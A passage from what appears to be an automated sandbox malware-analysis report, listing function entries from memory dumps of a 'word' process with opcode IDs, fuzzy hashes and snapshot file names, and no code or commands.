                        • Opcode ID: ba83448dd81c0f63d84d477a1a08a716fac1c6cb04b1e24880345dc345500f8e
                        • Instruction ID: ad15f131d49d5dfdac40f1d433844e734a140a12ce8efc53a328bfc5c8e14619
                        • Opcode Fuzzy Hash: ba83448dd81c0f63d84d477a1a08a716fac1c6cb04b1e24880345dc345500f8e
                        • Instruction Fuzzy Hash: 86F0A77420C244CFC704DFA4E09069E3BA6EF89305F208458E0059F3A9DB309996DB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BD6A8 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db9be8b5e0b20120c9c8344fd5d4ecdd4f17aba7fa39ddbc1fa2815746aaebdc
                        • Instruction ID: 20f9f57dedcdaa2abdbd15b46da2f8f160b16efd78d699eda58b4cc5b0a7f0c4
                        • Opcode Fuzzy Hash: db9be8b5e0b20120c9c8344fd5d4ecdd4f17aba7fa39ddbc1fa2815746aaebdc
                        • Instruction Fuzzy Hash: BAE0C23D3042187B1116266A7889CBFBB9FEBCA67E314412EF90AD3745DD61AC0297F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B0460 Relevance: .0, Instructions: 26COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5fba4437ebfe13ccfd27e19d960ca709d3610c5d84cde4585f95205c073dd682
                        • Instruction ID: ece11b257e6b02ccd1bc586019412be8e5acf7ee00f1b7d9d20a4c0b9c04abac
                        • Opcode Fuzzy Hash: 5fba4437ebfe13ccfd27e19d960ca709d3610c5d84cde4585f95205c073dd682
                        • Instruction Fuzzy Hash: 52E01A2820E7D04FE3038A3844620E67F60DE8324834995CBD0E4CF2A3C609994BE7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6133B Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7fa954f2a3d2fe518eddf381b1f18848ba2f20c5cf008b50d1258e2348ed6902
                        • Instruction ID: ff95b350ec7ccba876429304bf6ad7755d021f4b0b6d7110e3e9ca9150400c62
                        • Opcode Fuzzy Hash: 7fa954f2a3d2fe518eddf381b1f18848ba2f20c5cf008b50d1258e2348ed6902
                        • Instruction Fuzzy Hash: 0BF03A70904218CFDB54DF95D4847AEBBB1FB49305F248569D025AB2A5C775C442CF41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B7418 Relevance: .0, Instructions: 25COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 34359da37d62c5428ed99d58907aefe4215d4b34400f2d8ae00d7bacce42a126
                        • Instruction ID: 77fc119f2a78d005c3753a4faad20332ec386d52826e06531f847d4d762daf5f
                        • Opcode Fuzzy Hash: 34359da37d62c5428ed99d58907aefe4215d4b34400f2d8ae00d7bacce42a126
                        • Instruction Fuzzy Hash: 9CE0923D6482858FC303CBB584A08E5BFB09E9620935D81DED44DCB327C222D812EB41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8B98 Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f5ca8c9cbb5507b12c1481599fdb505a6fe7fe1ed0f11d1ad23375f54b828b7
                        • Instruction ID: df18251493c2ecd7cc41abe9711723e9fc05a3339ac3dd3925f7362f23c35b8e
                        • Opcode Fuzzy Hash: 2f5ca8c9cbb5507b12c1481599fdb505a6fe7fe1ed0f11d1ad23375f54b828b7
                        • Instruction Fuzzy Hash: E5E04FA691920DEFC703EFA0C9114DABBB8EF0625571011D6E145DB222EA314B14D7D2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60438 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6885378b28059be56a8e10de573c23f8840a45a3d71de18e88bc2a28b77be024
                        • Instruction ID: b53ea816f06ce8ebc9974666713bcde73f0bd24fc50ed02319e2dfab3498d380
                        • Opcode Fuzzy Hash: 6885378b28059be56a8e10de573c23f8840a45a3d71de18e88bc2a28b77be024
                        • Instruction Fuzzy Hash: 7BE0467045A3849FCB269B70A8687AE7F30FF07702B140A9AD449D21A2C6690829C726
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8DE8 Relevance: .0, Instructions: 23COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9f9444abae650f2db0467788cb9c558e5be5e441e8008bb534e688edaf8f5dc1
                        • Instruction ID: 76bcf7f701f96514f000c8694aaf27fc48b9d2a0ab9c4b01a0e2657d969c3bf8
                        • Opcode Fuzzy Hash: 9f9444abae650f2db0467788cb9c558e5be5e441e8008bb534e688edaf8f5dc1
                        • Instruction Fuzzy Hash: 56E04831105259BFCB028F94DD01CA67F75EF4A2507088087FD148B262D672DD22D7D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C63135 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e7087c51ca1bc4c91bc47e5ec24f478366443aecafbc702753c505817ffc3e6
                        • Instruction ID: 7b00f89e02a883f68c4d40685ef7eccd6e07d91d7643ef753e54c0d95484ae8f
                        • Opcode Fuzzy Hash: 2e7087c51ca1bc4c91bc47e5ec24f478366443aecafbc702753c505817ffc3e6
                        • Instruction Fuzzy Hash: 4EF0ED75A05158CFEB14CF45D8C5E9CFBB2FB85310F6080A6E60A9B260D7309A819F50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8188 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3362796eaa6aabab80d8c6298f6ef439a2a05c3ca9fee3255f7156990596d3e2
                        • Instruction ID: 36dd9321ccf68b4a7326356eb60ce21d83d3f8b709bd9a01aee8efe82f0d1c63
                        • Opcode Fuzzy Hash: 3362796eaa6aabab80d8c6298f6ef439a2a05c3ca9fee3255f7156990596d3e2
                        • Instruction Fuzzy Hash: A6E01A3810E2D19FC3078F6498258A6BFB59F9B50470984CFE5C09B263C556AC16EBB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BA598 Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 26339720f9b8c13a225c9cd6cb74a5860d3fffbb6e34570cdfc3c84ff9d87a0d
                        • Instruction ID: 0ad11478aea1f9daf64b9ce7e12f2a5e58d78fa434f81bf53ab72a1f7db5c43f
                        • Opcode Fuzzy Hash: 26339720f9b8c13a225c9cd6cb74a5860d3fffbb6e34570cdfc3c84ff9d87a0d
                        • Instruction Fuzzy Hash: 89E01A6121C3A19EC312CF54D820866BFB89F9A50070884CFB480DB262C5659D46C7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B81C8 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 045652ea90397be9c317d5d325e5d953bbe2dcf79b2bfecc4bb5736af40d6b3d
                        • Instruction ID: 2049c112dfd07bc591f29116c45f72b6a20a184b8454b8ebdc45927318c1e8cb
                        • Opcode Fuzzy Hash: 045652ea90397be9c317d5d325e5d953bbe2dcf79b2bfecc4bb5736af40d6b3d
                        • Instruction Fuzzy Hash: 17D012723044187BDB056A8DE811FEB3B5ED7C9722F108026F6058B245C9768C15A7E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8AA7 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1a2fc1dd30282c6d370a5f0cd3d3a46db21d5576b66104013382901d776e9346
                        • Instruction ID: 7fb89bdc460d370611bbc6629a4dc5f0ec6b081ee801ba5561c4d74dabc0c674
                        • Opcode Fuzzy Hash: 1a2fc1dd30282c6d370a5f0cd3d3a46db21d5576b66104013382901d776e9346
                        • Instruction Fuzzy Hash: E4E08C36201108AFCB018E84DC009E57B25EF99220B24C05AFC088B352CBB6CD22DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B9DC8 Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 760fd3c0ac81ec19eec389e122287e902dea6f9ca10aa4fa969e1982374a9c45
                        • Instruction ID: 69186bab56ec35caf9f157c9eb28db1e5dac9483321d8eccac8e5273abf7206e
                        • Opcode Fuzzy Hash: 760fd3c0ac81ec19eec389e122287e902dea6f9ca10aa4fa969e1982374a9c45
                        • Instruction Fuzzy Hash: 9EE086725091586FC741CE84D850CA57F79DB46210714C09BFC59CB252C672CD12DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B151A Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ad7f07e8b7138548a3668f2d9d9916c287e1dd6495eae164f50346d5d38161e2
                        • Instruction ID: 605ac9dde7f63b032b458acc5ddabd2e5adea7cf3fe3a4d3d2b5ca302bfb6a93
                        • Opcode Fuzzy Hash: ad7f07e8b7138548a3668f2d9d9916c287e1dd6495eae164f50346d5d38161e2
                        • Instruction Fuzzy Hash: A7E04676C0E2C8EFDB02DFB495214A9BFB1CE0320571506DBD586CB222E9215A14A762
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BCB88 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12017ecb7c58c7c658a2e7300404f15a13f8d6a8cede6095cf578772ecc56656
                        • Instruction ID: e7cac946107f36f632040eb6423c3c6044e1d1c170fe5eebdce5a92198f5ce72
                        • Opcode Fuzzy Hash: 12017ecb7c58c7c658a2e7300404f15a13f8d6a8cede6095cf578772ecc56656
                        • Instruction Fuzzy Hash: 7DE0863510C2914FC306CF14E560866BFB4DF8650071444CFF48487362C9269D0BC772
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BC9F8 Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 108890d25d8aea0c122dbb23362f61fb2e88a4dfb491941cb9155ff6ec988f78
                        • Instruction ID: 0cae6f821d1ad7be05064e2469278cba04b52c1ce4ed7a254121aaa2708530e6
                        • Opcode Fuzzy Hash: 108890d25d8aea0c122dbb23362f61fb2e88a4dfb491941cb9155ff6ec988f78
                        • Instruction Fuzzy Hash: A1E08C7020D3919FC343CB24EA9086ABFB5DFC6A1070884DFF4849B262C5618D0AC773
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B4350 Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b464d81e480cbcaf673041fd15619aa00ad447e2291f6eabbeda784472a8b650
                        • Instruction ID: 96108f3601c2931261168f17435c485dcffd460060eff0af934b4aee1cdef0a0
                        • Opcode Fuzzy Hash: b464d81e480cbcaf673041fd15619aa00ad447e2291f6eabbeda784472a8b650
                        • Instruction Fuzzy Hash: 63E0EC3820D6C24FC316CB28C8615A5BFB1AFDB204B18D4EAD5A4CF367C5359813EB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BBC51 Relevance: .0, Instructions: 19COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f018e5337d0d2097d958a7bba93b527a067244e9515c3af7d4fd514916c5c3a2
                        • Instruction ID: 7e61b6b8a4660dd399d16a935b675e300f384d05eb2b79e61a8014dad0b33cc0
                        • Opcode Fuzzy Hash: f018e5337d0d2097d958a7bba93b527a067244e9515c3af7d4fd514916c5c3a2
                        • Instruction Fuzzy Hash: AEE0CD7A80D20CAFD703DFE0899148D7FB4CF02109F1045EED503D7111DD314A109791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B9F78 Relevance: .0, Instructions: 18COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 723336ce1e76aadef1ec9f648200d811a86af0aa58933574d69a5d4d31ed7446
                        • Instruction ID: 126cc4b9b9d36587839a0d36aa8d3489696d17be3d9833fc0e08181a227376fd
                        • Opcode Fuzzy Hash: 723336ce1e76aadef1ec9f648200d811a86af0aa58933574d69a5d4d31ed7446
                        • Instruction Fuzzy Hash: FBD017742192409BC742CB58C855892BBB19F97208308D0AEE084CF362EA21A903C7A6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B922F Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b1f4ec4238c9fabb961155206db29b8f76aa941874cb256a3ad01fdc351839e
                        • Instruction ID: edb2a35e76dd0769a8fd8281e7463155538368ee37250813737257cc5cfa8b97
                        • Opcode Fuzzy Hash: 9b1f4ec4238c9fabb961155206db29b8f76aa941874cb256a3ad01fdc351839e
                        • Instruction Fuzzy Hash: 5BD0C72C7552415FC7479B14D850491B7B19FCA30431894E9B50CCB762DA258D07C755
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C60448 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d9952660314f5e6c59e35f2426443ebb29c67db2e0997e6f9d42ed221710ffb5
                        • Instruction ID: e9a7f77f24740da91f8d9673fb04ace6a48ed7b0b367609a350feb9fd7378228
                        • Opcode Fuzzy Hash: d9952660314f5e6c59e35f2426443ebb29c67db2e0997e6f9d42ed221710ffb5
                        • Instruction Fuzzy Hash: D9D0C9704552099FC728ABA4F85CBAEBA68FB0B706F005954A50992250DB7249508665
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6240F Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c3ef230f3e06ec500593916cebc0f326d482e428bff00b1e4614c60803941503
                        • Instruction ID: 79623183fdbb3adc45012f9e1487391aade5c3cb535f76b393e3809d11bceba0
                        • Opcode Fuzzy Hash: c3ef230f3e06ec500593916cebc0f326d482e428bff00b1e4614c60803941503
                        • Instruction Fuzzy Hash: EED05EB180910CEF8B10CFA099405AEBBB4DB04300B2046AAD907E3220EA310A10AB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C62410 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4d955a7c09309e45f1652d928cfc0c1f67692154e48524f5018bb24e6d3e632
                        • Instruction ID: 10d8ea5bfa371af06eff0821dcde60fa36cff5d16fd25b9e82829a953197614c
                        • Opcode Fuzzy Hash: b4d955a7c09309e45f1652d928cfc0c1f67692154e48524f5018bb24e6d3e632
                        • Instruction Fuzzy Hash: F3D0C7B190510CEF4B10DFE1D9445AEB7B9DB05311F2046B5D906D7210EE315F50A791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C64721 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e0af93285ed0e6cda5967461ff0db9b816c8c2fa0c63452ee319f11893f65fe5
                        • Instruction ID: 80dfefaa19b7b279b3133493b583feb48e88d1778e60cc8f55a92da58bd480d8
                        • Opcode Fuzzy Hash: e0af93285ed0e6cda5967461ff0db9b816c8c2fa0c63452ee319f11893f65fe5
                        • Instruction Fuzzy Hash: 07E0BD74A011488FCB549F65D9A8B9C7BF1FF48301F0081AAEA0AC7370DE319E808F00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C67AB8 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 60c3f3cdbf818eded209387cab2dc9ba4c57d73daec2ec73a69f0d849d493dfc
                        • Instruction ID: b30e55c0802e47677e6f92b7605d5d00f0313c077dad77c4c1e00de17c68d371
                        • Opcode Fuzzy Hash: 60c3f3cdbf818eded209387cab2dc9ba4c57d73daec2ec73a69f0d849d493dfc
                        • Instruction Fuzzy Hash: 17D0A9B2C0D10CFB8B11EFE0D94089EBBA9DB40200F100AA69A0697210EE320B10ABD2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00C6DFA8 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.521166837.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_c60000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0d4bc44f356f2274999035defa0e9bab806763eec132c213b3a7b868cd29e0d9
                        • Instruction ID: 6b8a1558f7049d16b3aba8521258c034f8e1d6e97162e6392480634b4e898721
                        • Opcode Fuzzy Hash: 0d4bc44f356f2274999035defa0e9bab806763eec132c213b3a7b868cd29e0d9
                        • Instruction Fuzzy Hash: 6FD0A972D0D20CFB8B10EFE0CA4249EB7E8DB00200B1005E6A60697210EE325B106BD2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BE2B8 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0b9ffd499dd662c1729de5be09ac0378c090ee2100b2f8c217da433dc221975c
                        • Instruction ID: 8de6a0fc57f9a06531ef02dd4f4d497220a4d1d530de178bd1de3b9065ffa4b3
                        • Opcode Fuzzy Hash: 0b9ffd499dd662c1729de5be09ac0378c090ee2100b2f8c217da433dc221975c
                        • Instruction Fuzzy Hash: 94D0A771C0D10CFF4701DFE0C50189E77A8DB00105B1009E6D505D7210ED315B109BD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B1528 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1db1e6fa2ca3305fc977ce15f142f87814a7c14585e75f94cf4f16677c68667e
                        • Instruction ID: 7e245bde445a10afdb133adc457be732f4dd9126ae3208081eab0d0f7ec71cd3
                        • Opcode Fuzzy Hash: 1db1e6fa2ca3305fc977ce15f142f87814a7c14585e75f94cf4f16677c68667e
                        • Instruction Fuzzy Hash: 5CD0A772C0910CFF8B01DFA0D50149EB7F8DB00204B0005A69506D7210EE315B1097D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B8BA8 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12f9a9fb3d1d0f5de97fe7f83fd4d60cf2a569632ef203127c43aad345c3ef5e
                        • Instruction ID: b7bfbc596e59cce1b5259cad76942d9bc0998d355be024fcd4f23d54bdb98235
                        • Opcode Fuzzy Hash: 12f9a9fb3d1d0f5de97fe7f83fd4d60cf2a569632ef203127c43aad345c3ef5e
                        • Instruction Fuzzy Hash: E8D0C9B6D0910CFF9B11EFA0DA4299EB7EDDB05214B1045EAD606D7210EE725B10ABD1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B9CE8 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f693ee38176fcd42f2875cef50f54b7930377b1ff10c2f224a2c8c964e7ab7ee
                        • Instruction ID: 22b2d3b3732d5e13a149f7fc958f7c4153825fdabaadfb5173171545a9285672
                        • Opcode Fuzzy Hash: f693ee38176fcd42f2875cef50f54b7930377b1ff10c2f224a2c8c964e7ab7ee
                        • Instruction Fuzzy Hash: 83D0A771C0910CFB9701DFA4D5415DE77E8DB05104B0005A6D605D7210EE315B1097D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028BBC60 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 83e0eb885914963a5c85388e54d5fecf239cb0d66cfc721e974e1f8a6c5eaf9d
                        • Instruction ID: 33778693d738c372f5f7d59e1a9db176cae6706e0b2878c011c3ed1582cda287
                        • Opcode Fuzzy Hash: 83e0eb885914963a5c85388e54d5fecf239cb0d66cfc721e974e1f8a6c5eaf9d
                        • Instruction Fuzzy Hash: 0ED0A77180910CFB5701DFE0C54149EB7E8DF01105B0005AAD507D7210ED315B1097D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028B9D13 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000014.00000002.522376008.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_20_2_28b0000_word.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 50a2e91f89eba8fca23c3456d981d223542b7df0739cd7f9135af16888a02de2
                        • Instruction ID: e8c1ca310e5a85f8ad0421923dfbd93dc0b9917e85a7b6fb655ae170a034d127
                        • Opcode Fuzzy Hash: 50a2e91f89eba8fca23c3456d981d223542b7df0739cd7f9135af16888a02de2
                        • Instruction Fuzzy Hash: 3DD0801E04D1D46FC7135B65A4A54D03F64DD5724130905C7E8CD4F133D6015517D7D3
                        Uniqueness

